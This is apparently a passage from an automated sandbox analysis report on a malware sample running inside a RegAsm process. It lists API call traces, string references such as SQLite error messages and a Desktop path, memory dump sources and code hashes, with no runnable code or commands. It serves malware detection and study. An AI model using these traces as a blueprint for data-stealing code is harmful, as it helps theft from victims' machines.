                                                                                                                                                                                                                                                                • Part of subcall function 0040D727: strlen.MSVCRT ref: 0040D749
                                                                                                                                                                                                                                                                • Part of subcall function 0040D727: strlen.MSVCRT ref: 0040D7E2
                                                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,00000000,?,65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30,00000000,00000000,000000FF), ref: 0040D93B
                                                                                                                                                                                                                                                              • VirtualQueryEx.KERNEL32(?,00000000,?,0000001C), ref: 0040DA05
                                                                                                                                                                                                                                                              • ??_V@YAXPAX@Z.MSVCRT ref: 0040DA16
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strlen$QueryVirtual
                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                              • API String ID: 3099930812-2766056989
                                                                                                                                                                                                                                                              • Opcode ID: e4964f2df1008eb0ee9e1ca68b90a3f04829a9b14becb9e4934092ad6d31146c
                                                                                                                                                                                                                                                              • Instruction ID: 822ec094d55a4208c2755145bcec9d607f6c05e83d8da933b23198d366d7e4e4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4964f2df1008eb0ee9e1ca68b90a3f04829a9b14becb9e4934092ad6d31146c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01416972E00109AFEF14DFA5CD41AEE7BB6EB44354F14802AF905B2290D7789E549BA8
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040FF75
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040FFA0
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,0042445C,00000000,?,?,?,00000000), ref: 0040FFE3
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,00424458,00000000,?,?,?,00000000), ref: 00410011
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,00424454,00000000,?,?,?,00000000), ref: 00410036
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,00424450,00000000,?,?,?,00000000), ref: 00410067
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0041009D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: strtok_s$H_prolog
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1158113254-0
                                                                                                                                                                                                                                                              • Opcode ID: ad376ae8866a2c7cb0f5ab09607c360d28ddadc7ab7bc2ca8b04ddbcda8e53df
                                                                                                                                                                                                                                                              • Instruction ID: e13e341dc4e37fbc94374f59f2af7a78e3056599aa0a0f60075e6cc9e2652744
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad376ae8866a2c7cb0f5ab09607c360d28ddadc7ab7bc2ca8b04ddbcda8e53df
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C41C131A002069FCB24DF65ED81BEA7BE8EB18309F10543FE405E6691D7BCD6C08B59
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,3B494859,?,?,00000000,19A2D1CB,000000FF,?,199D5B30,?,?,199D5ADF,?), ref: 199D5BF6
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 199D5C08
                                                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,19A2D1CB,000000FF,?,199D5B30,?,?,199D5ADF,?), ref: 199D5C2A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                              • String ID: CorExitProcess$YHI;$mscoree.dll
                                                                                                                                                                                                                                                              • API String ID: 4061214504-3552725690
                                                                                                                                                                                                                                                              • Opcode ID: 104cfd7b646a24080ca7bbd8f2aae7e914ecf30d1d649c6768a4fe48e97b7efd
                                                                                                                                                                                                                                                              • Instruction ID: 14c99451439312a15996c8b9926b5a9fd5d3c0be28e43ac39b8994bfc7864abc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 104cfd7b646a24080ca7bbd8f2aae7e914ecf30d1d649c6768a4fe48e97b7efd
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7E01DB31914669EFDB028FA4CC84BAEBBFCFB44710F050929F816A22C0D7799405CB90
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: bc20c8dc09047b863917c20ea8f8128134a29b6839e974f132aeb8ac42ac7d3f
                                                                                                                                                                                                                                                              • Instruction ID: 60739d6f69a7baf87046d33292ed7ccee9db5d3b1d2d7119bf83d255022016bb
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc20c8dc09047b863917c20ea8f8128134a29b6839e974f132aeb8ac42ac7d3f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 10F12571A043429FD705CF28D88075ABBE0BF65328F4C466FEC9A97281D736E946CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • recursively defined fts5 content table, xrefs: 19846DE2
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: recursively defined fts5 content table
                                                                                                                                                                                                                                                              • API String ID: 0-437020801
                                                                                                                                                                                                                                                              • Opcode ID: 96593f08ee4bc08b7585c89c1f5d61ccc346aa55042d5df7130fb6f987fd2bea
                                                                                                                                                                                                                                                              • Instruction ID: cdf5d48048f651a6b3d1adfa20476445789e781b0d48e1fe906b660b001db92d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96593f08ee4bc08b7585c89c1f5d61ccc346aa55042d5df7130fb6f987fd2bea
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64D10575905349CFDB04CF19C480757B7E0FF99328FA8456EE8898B281D776E48ACB92
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004196E5
                                                                                                                                                                                                                                                                • Part of subcall function 004180C3: __mtinitlocknum.LIBCMT ref: 004180D9
                                                                                                                                                                                                                                                                • Part of subcall function 004180C3: __amsg_exit.LIBCMT ref: 004180E5
                                                                                                                                                                                                                                                                • Part of subcall function 004180C3: EnterCriticalSection.KERNEL32(00000000,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A,?,?,00416C9B,00000000,0042A308,00416CE2,K@), ref: 004180ED
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(0042A290,00000020,00419828,00000000,00000001,00000000,?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D), ref: 00419721
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 00419732
                                                                                                                                                                                                                                                                • Part of subcall function 00418CAA: EncodePointer.KERNEL32(00000000,0041C87C,0063D400,00000314,00000000,?,?,?,?,?,00419A3F,0063D400,Microsoft Visual C++ Runtime Library,00012010), ref: 00418CAC
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(-00000004,?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 00419758
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 0041976B
                                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,0041984A,000000FF,?,004180EA,00000011,00000000,?,00418D31,0000000D,?,?,00419185,00417C1A), ref: 00419775
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2005412495-0
                                                                                                                                                                                                                                                              • Opcode ID: 26d60fc1e1d7487970be1ae3c74afe372c3d886327b81f1a05011ea4f43e310a
                                                                                                                                                                                                                                                              • Instruction ID: 641049035220b12586841d40c2ba73ec3ae0c6e9ad58b3a11f25b8d1400e18c3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 26d60fc1e1d7487970be1ae3c74afe372c3d886327b81f1a05011ea4f43e310a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E131277091031ADFDF10AFA9E8546EDBBF1BF09314F14402BE424A6291DBB94D91CF69
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • __getptd.LIBCMT ref: 004184BC
                                                                                                                                                                                                                                                                • Part of subcall function 00418E14: __getptd_noexit.LIBCMT ref: 00418E17
                                                                                                                                                                                                                                                                • Part of subcall function 00418E14: __amsg_exit.LIBCMT ref: 00418E24
                                                                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 004184DC
                                                                                                                                                                                                                                                              • __lock.LIBCMT ref: 004184EC
                                                                                                                                                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00418509
                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041851C
                                                                                                                                                                                                                                                              • InterlockedIncrement.KERNEL32(0042B1C0), ref: 00418534
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3470314060-0
                                                                                                                                                                                                                                                              • Opcode ID: c8c7d40bab74427e7612ed86395c8ba12905a639c1402f03f75e31aa81c048a8
                                                                                                                                                                                                                                                              • Instruction ID: 9cd51a609155e9c26de26d2a0fff125873f278f94aff41f161ea964d547d68e9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8c7d40bab74427e7612ed86395c8ba12905a639c1402f03f75e31aa81c048a8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0016131A00621EBD721AB65A805BDA7761EF04768F54401FE800A7281DF3C6EC2CBDE
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,0041041A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040F947
                                                                                                                                                                                                                                                              • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,0041041A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040F960
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000104,?,0041041A,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 0040F972
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0040F984
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                              • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                                                                                                              • API String ID: 1206339513-4107738187
                                                                                                                                                                                                                                                              • Opcode ID: 6c8bcea1d6fb0e8869a490e36bf7965392f11d5c9099109b4d31fc5b04f97877
                                                                                                                                                                                                                                                              • Instruction ID: 7f360261b8c393262e79215f862bbd3f352f1fd510d59be435c59fa084f67c4e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6c8bcea1d6fb0e8869a490e36bf7965392f11d5c9099109b4d31fc5b04f97877
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F089332002197FDB011F99AC48E9BBFAEEF59775B040029FD08A3211C77159258BE5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1992AE0E
                                                                                                                                                                                                                                                              • misuse, xrefs: 1992AE18
                                                                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 1992AE1D
                                                                                                                                                                                                                                                              • unable to delete/modify user-function due to active statements, xrefs: 1992AD61
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                                                                              • API String ID: 0-3864549341
                                                                                                                                                                                                                                                              • Opcode ID: 29f1597bd3f0d479c817673ba4e1aa81f518c7e714b6f005adbf3f0539e39aae
                                                                                                                                                                                                                                                              • Instruction ID: 5b78f938d9b97bd8918e9a19699a9ea307a5338d2a954d51af4e05ce0bbb3919
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29f1597bd3f0d479c817673ba4e1aa81f518c7e714b6f005adbf3f0539e39aae
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B510372606300AFD7118E24DC80B6FB7F8EFC9755F88492DF586962D5D336D8018BA2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
